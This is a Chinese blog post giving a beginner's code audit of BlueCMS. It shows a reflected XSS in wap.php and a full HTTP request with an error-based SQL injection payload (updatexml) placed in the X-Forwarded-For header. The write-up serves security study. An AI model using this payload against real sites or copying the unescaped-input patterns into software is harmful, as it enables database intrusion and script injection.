bluecms代码审计入门

最新推荐文章于 2022-10-26 21:30:51 发布
最新推荐文章于 2022-10-26 21:30:51 发布
阅读量651 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/125453045
版权

bluecms是一个非常简单的cms适合入门学习php代码审计,这里直接用上seay进行自动审计在一个个验证

前台xss,出现在wap.php,通过request方式接受t参数并且直接输出

<?php
$t=$_REQUEST['t'];
//echo $t;
//exit;
?>
<script type="text/javascript">
//如果只跳转首页+启用动态浏览就把wap.php设置为第一个默认文档 如果启用静态浏览就把index.html设置为第一个默认文档 在index.html里加入跳转到手机站的判断代码
var mobileAgent = new Array("iphone", "ipod", "ipad", "android", "mobile", "blackberry", "webos", "incognito", "webmate", "bada", "nokia", "lg", "ucweb", "skyfire");
var browser = navigator.userAgent.toLowerCase();
var isMobile = false; 
for (var i=0; i<mobileAgent.length; i++)
{ 
if (browser.indexOf(mobileAgent[i])!=-1)
{ 
isMobile = true; 
//alert(mobileAgent[i]); 
location.href = 'm.php?t=<?php echo $_REQUEST['t'] ?>';
break; 
}
else
{
location.href = 'index.php?t=<?php echo $_REQUEST['t'] ?>';//首页模板不要加跳转到手机站的判断代码
}
} 
</script>

直接访问wap.php?t=就能直接触发

留言板报错注入这里因为没有对ip头进行过滤就拼接进sql语句中

	function add(){
		if($GLOBALS['G_DY']['vercode']==1){
		if(!$this->syArgs("vercode",1)||md5(strtolower($this->syArgs("vercode",1)))!=$_SESSION['doyo_verify'])message("验证码错误");
		}
		if(!$this->syArgs('tid'))message("请选择栏目");
		$tid=$this->syArgs('tid');
		$this->type=syDB('classtype')->find(array('tid'=>$tid),null,'molds,classname,msubmit');
		if($this->type['msubmit']!=1){
			$this->member->p_r($this->type['msubmit']);
		}
		$isshow = ($this->my['group']['audit']==1) ? 1 : 0;
		$user = ($this->my['id']!=0) ? $this->my['user'] : '游客';
		$fmolds = ($this->syArgs('fmolds',1)!='') ? $this->syArgs('fmolds',1) : '';
		$title = ($this->syArgs('title',1)!='') ? $this->syArgs('title',1) : $this->type['classname'];
		$body = ($this->syArgs('body',1)!='') ? $this->syArgs('body',1) : '';
		$row1 = array('tid' => $tid,'fmolds' => $fmolds,'faid' => $this->syArgs('faid'),'title' => $title,'addtime' => time(),'orders' => 0,'isshow' => $isshow,'user' => $user,'body' => $body,'reply'=>'');
		$row2=$this->fields_args('message',$tid);
		$add = syClass('c_message');
		$newv=$add->syVerifier($row1);
		echo $newv;
		if(false == $newv)
		{
			$a=$add->create($row1);$row2=array_merge($row2,array('aid' => $a));
			syDB('message_field')->create($row2);
			if($this->my['id']!=0){
				syDB('member_file')->update(array('hand'=>$this->syArgs('hand'),'uid'=>$this->my['id']),array('hand'=>0,'aid'=>$a,'molds' => 'message'));
			}else{
				syDB('member_file')->update(array('hand'=>$this->syArgs('hand'),'ip'=>GetIP()),array('hand'=>0,'aid'=>$a,'molds' => 'message'));

			}
			//message('发布成功',$GLOBALS["WWW"]);//bluecms 返回到了首页
			message('发布成功');//回到当前页面
		}
		else
		{
			message_err($newv);
		}

直接构造号数据包

POST /index.php?c=message&a=add&tid=23 HTTP/1.1
Host: www.blue.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Forwarded-For: 8.8.8.8' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))####
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://www.blue.com:8080
Connection: close
Referer: http://www.blue.com:8080/?c=message&a=type&tid=23
Cookie: PHPSESSID=1gobivh9getno63fuj0d67knn5
Upgrade-Insecure-Requests: 1

title=111&u_nianlin=111&download=111&hand=0006197981&body=1111

就到这里了这里的密码使用了两次md5加密,其实还有好多漏洞没有审计出来

qq_42307546
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
生命在于折腾——BlueCMS代码审计
易水哲的博客
09-23 903
BlueCMS代码审计
bluecms 手把手教你0day挖掘-基础入门
G208_522的博客
03-15 5385
Bluecms后台sql注入漏洞 一、环境搭建 1、PhP地方门户系统 BlueCMS v1.6 sp1 下载地址:https://down.chinaz.com/soft/26181.htm 2、PHPstudy apache,mysql集成环境 二、代码审计 在该cms系统中,其后台存在sql注入漏洞 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wmb7A4Ms-1647335609467)(https://gitee.com/gaohongyu1/csdn/raw/m
bluecmsv1.6代码审计
qq_42307546的博客
06-28 702
php
代码审计学习-BlueCMS框架代码审计
Alexhirchi的博客
11-05 1312
第一次的代码审计--BlueCMS代码审计 之前总说要学习代码审计,但每次面对大量代码时,又没什么开发经验,都是浅尝即止,面对几千行的代码毫无开始的头绪。(看来又印证了那句话:基础决定上层建筑)作为萌新 最开始我还是先去看了许多大佬的文章,了解一下他们的学习路线,并且学习了一些新的思路。这次挑了个小众的CMS入手–BlueCMS作为我的代码审计开始,顺便分享一些自己的总结。 环境配置: BlueCMS v1.6 sp1 windows7 PHP 5.4.45 + Apache +mysql 5.7..
Bluecms后台任意修改文件getshell
kiwi的博客
10-26 1516
前几天在入门代码审计的时候,拿bluecms学习,偶然在百度上面找到一篇文章是写bluecms拿shell的,就学习了一下,我认为应该有部分cms也存在此漏洞,可能文章有不足的地方欢迎师傅们批评指正。
bluecms1.6sp1(还是白盒入门)
Npceer-一位网安初学者的博客
10-02 1762
Bluecmssql注入ad_js.php存在sql注入XFF伪造/guest_book.php 再来一个入门级别的cms 然后就进入tp的复现了 直接开始吧 环境就不解释了 网上找个源码下载 找不到私聊我要也行 sql注入 先自己看看 seay放一边 等会在回来 ad_js.php存在sql注入 发现没啥过滤 trim去个空格没啥用 order by 7 时候不报错 直接联合注入 往下注注不动了 我好久不写sql注入了 这单引号进去被转义了咋办啊 改反引号没用 不知道为啥 有没有大佬解释一下的 解
bluecms源码 初级代码审计
07-31
bluecms1.6源码 适合代码审计初学者
bluecms-zzcms.rar
06-09
bluecms-zzcms两款适合新手的源代码审计,代码审计入门BlueCMS v1.6 sp1,适合练手的ZZCMS8.2漏洞
bluecms企业网站源代码
03-16
bluecms企业网站是一个以asp+access进行开发的企业建站cmsbluecms介绍: 1、BlueCMS核心程序不超过200K,全部由自定义系统写成,本程序最大的特点就是不用担心升级的问题,所有版本自动升级,所有高级版本标签都兼容...
Bluecms内容管理系统 v1.6sp1
08-29
v1.6演示地址:http://www.bluecms.net/demo 官方网站:http://www.bluecms.net/ 官方论坛:htpp://www.bluecms.net/bbs
BlueCMS漏洞大集合
02-03
client_ip伪造注入看代码吧,这里的getip函数是获取Ip的,由于,client_ip和x_forwarded_for都可以伪造。在include/common.fun.php的106行我们继续跟踪一下getip()这个函数的应用。comment.php中的113行这里我们伪造...
代码审计入门
mingyqf的博客
01-16 2301
代码审计入门 前言 最近在看php代码审计,学习下代码审计,看了不少师傅的博客,写的很好,下面不少是借鉴师傅们的,好记性不如烂笔头,记下,以后可以方便查看。 php代码审计需要比较强的代码能力和足够的耐心。这篇文章是写给我这样的刚刚开始审计的菜鸟,下面如果写的哪里有错误的话,还望提出,不吝赐教。 在这里也立个flag:一周至少审计一种CMS(大小不分),希望自己能够坚持下去,任重而道远。 代码审计–准备 1,先放一张大图,php代码审计的几个方向,也是容易出问题的地方,没事的时候可以多看看。 2,代码审计
熊海cms1.0(代码审计入门学习用)
Npceer-一位网安初学者的博客
09-27 3662
复现复现复现环境搭建这里出了两个问题 第一个第二个开始审计部分1.文件包含2.一个越权/inc/checklogin.php3.sql注入1.admin/login.php2.admin/files/newlink.php3.admin/files/reply.php4.admin/files/software.php5.admin/files/editlink.php 这5个都是一样留言板有xss1.files/contact.php反射XSS2.files/list.php同上 不写了下来翻了很多博客
代码审计Bluecms1.6详细汇总
王嘟嘟的博客
10-27 1287
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start SQL 文件路劲 完成 存在 uploads/ad_js.php √ √ uploads/ann.php √ ╳ uploads/index.php √ ╳ uploads/...
cms代码审计练习
黑面狐
04-18 1528
1、letter-post 存在xss漏洞打开写信文件modul/letter/post.phppost 提交进来的数据都经过p8_stripslashes2函数处理跟踪p8_stripslashes2函数lang/inc/init.php可以判断magic_qutes 开启时直接使用p8_stripslashes函数,不开启时直接返回输入的字符继续追踪p8_stripslashes函数删掉反斜杠...
代码审计入门
Grey的博客
07-13 2707
一、漏洞挖掘与防范1.搭建环境&lt;?php header("content-type:text/html;charset=utf-8"); //设置编码 $uid = $_GET['id']; $sql = "SELECT * FROM userinfo where id = $uid"; $conn = mysql_connect('localhost','root','root'); my...
Bluecms代码审计&&复现
温和的跳跃
11-13 370
我终于能接受php代码看似奇怪的写法了发自内心承认它了,然后基础语法会了,看这些代码没有问题了 基本上无困惑感。根据seay工具一共找到255个漏洞。我今天心情还不错,应该再没有破坏了,再破坏又能破坏到什么地方去呢,还有什么可以破坏的呢。我觉得不会再差了那就是好的开始。所以心情很好。一切只能用鬼使神差解释了。可能上天想眷顾别人,我只希望让我变勤快一点变聪明一点吧。 这漏洞十分沙雕作为代码审计low级别的cms学习一下php语法和代码审计基本套路复习渗透测试常规手段还行。10年php写成这样可以了,好像
代码审计Bluecms—sql—ad_js.php
王嘟嘟的博客
10-26 690
0x00 前言 如饥似渴的学习ing。 你可能需要看看这个: https://blog.csdn.net/qq_36869808/article/details/83029980 内容说明 这个漏洞大家之前都复现过,但是我也想试一试。我也不知道大佬们是怎么挖掘出来的。难道真的是一个参数一个参数进行尝试吗。这些疑问都是需要解决的。 0x01 start 1.黑盒测试 首先来看一下sql注入点 htt...
bluecms网站搭建
最新发布
04-09
BlueCMS是一种网站搭建系统,它提供了一个简单而强大的平台,用于创建和管理个人或企业网站。以下是关于BlueCMS网站搭建的一些介绍: 1. 界面友好:BlueCMS拥有直观的用户界面,使得网站搭建变得简单易用。无需编程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值